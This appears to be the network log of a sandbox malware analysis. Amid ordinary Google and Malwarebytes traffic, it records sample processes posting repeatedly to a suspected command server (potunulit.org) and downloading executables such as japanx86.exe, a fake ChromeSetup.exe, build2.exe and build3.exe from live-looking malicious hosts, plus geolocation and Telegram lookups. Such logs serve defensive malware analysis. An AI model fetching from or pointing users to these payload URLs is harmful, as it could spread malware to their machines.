                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/graphs?relationships=owner%2Cviewers%2Ceditors
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      DNS
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.162
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.6
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.42
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.106
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.42
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.42
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.234
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.106
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      104.18.33.245
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.64.154.11
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=1540717-3602164
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 2061448
                                                                                                                                                                      x-request-id: 4d600038-42c6-4ede-8ee5-d268006aa1d5
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44591
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 1540717-3602164/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=3602165-6406947
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 2804783
                                                                                                                                                                      x-request-id: d02f0bae-f26d-47b1-92ae-947268eced2b
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44592
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 3602165-6406947/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=6406948-6760941
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 353994
                                                                                                                                                                      x-request-id: e1af7da4-8a7d-42b9-acf2-18c037d54932
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44594
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 6406948-6760941/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.163
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      beacons-handoff.gcp.gvt2.com
                                                                                                                                                                      beacons-handoff.gcp.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.99
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.206
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      sb-ssl.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.206
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.113
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.74
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.91
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.54
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.74
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.113
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.54
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      108.156.60.91
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.188.37.165
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.216.1.172
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.39.83.8
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.217.225.174
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.191.242.132
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.239.99.67
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.167.190.17
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.228.10.218
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      44.225.144.144
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.188.37.165
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.39.83.8
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      35.167.135.90
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.239.32.116
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.239.32.116
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      elb-telemetry-prod-external-1332413525.us-west-2.elb.amazonaws.com
                                                                                                                                                                    • 188.114.96.0:80
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      http
                                                                                                                                                                      355.4kB
                                                                                                                                                                      19.0MB
                                                                                                                                                                      7313
                                                                                                                                                                      13663

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://potunulit.org/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 194.110.203.101:80
                                                                                                                                                                      http://194.110.203.101/puta/japanx86.exe
                                                                                                                                                                      http
                                                                                                                                                                      8.0kB
                                                                                                                                                                      450.2kB
                                                                                                                                                                      170
                                                                                                                                                                      328

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://194.110.203.101/puta/japanx86.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 95.217.49.230:443
                                                                                                                                                                      https://polyzi.com/systems/ChromeSetup.exe
                                                                                                                                                                      tls, http
                                                                                                                                                                      6.7kB
                                                                                                                                                                      352.5kB
                                                                                                                                                                      136
                                                                                                                                                                      260

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://polyzi.com/systems/ChromeSetup.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 104.80.225.205:443
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 91.215.85.155:32796
                                                                                                                                                                      E738.exe
                                                                                                                                                                      9.6kB
                                                                                                                                                                      6.3kB
                                                                                                                                                                      27
                                                                                                                                                                      23
                                                                                                                                                                    • 91.215.85.155:32796
                                                                                                                                                                      E95C.exe
                                                                                                                                                                      7.4kB
                                                                                                                                                                      6.0kB
                                                                                                                                                                      24
                                                                                                                                                                      19
                                                                                                                                                                    • 52.182.143.208:443
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 162.0.217.254:443
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      tls, http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      1.0kB
                                                                                                                                                                      8.1kB
                                                                                                                                                                      14
                                                                                                                                                                      10

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://api.2ip.ua/geo.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      429
                                                                                                                                                                    • 162.0.217.254:443
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      tls, http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      1.2kB
                                                                                                                                                                      8.2kB
                                                                                                                                                                      17
                                                                                                                                                                      12

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://api.2ip.ua/geo.json

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      429
                                                                                                                                                                    • 190.219.54.242:80
                                                                                                                                                                      http://uaery.top/dl/build2.exe
                                                                                                                                                                      http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      15.7kB
                                                                                                                                                                      453.6kB
                                                                                                                                                                      339
                                                                                                                                                                      338

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://uaery.top/dl/build2.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 195.158.3.162:80
                                                                                                                                                                      http://spaceris.com/lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true
                                                                                                                                                                      http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      417 B
                                                                                                                                                                      979 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://spaceris.com/lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 195.158.3.162:80
                                                                                                                                                                      http://spaceris.com/files/1/build3.exe
                                                                                                                                                                      http
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      649 B
                                                                                                                                                                      10.5kB
                                                                                                                                                                      12
                                                                                                                                                                      11

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://spaceris.com/files/1/build3.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 82.115.223.77:8081
                                                                                                                                                                      venuzye.exe
                                                                                                                                                                      372.3kB
                                                                                                                                                                      6.1kB
                                                                                                                                                                      299
                                                                                                                                                                      151
                                                                                                                                                                    • 8.248.5.254:80
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 8.248.5.254:80
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 8.248.5.254:80
                                                                                                                                                                      322 B
                                                                                                                                                                      7
                                                                                                                                                                    • 149.154.167.99:443
                                                                                                                                                                      https://t.me/year2023start
                                                                                                                                                                      tls, http
                                                                                                                                                                      build2.exe
                                                                                                                                                                      1.5kB
                                                                                                                                                                      19.5kB
                                                                                                                                                                      24
                                                                                                                                                                      20

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://t.me/year2023start

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 49.12.113.110:80
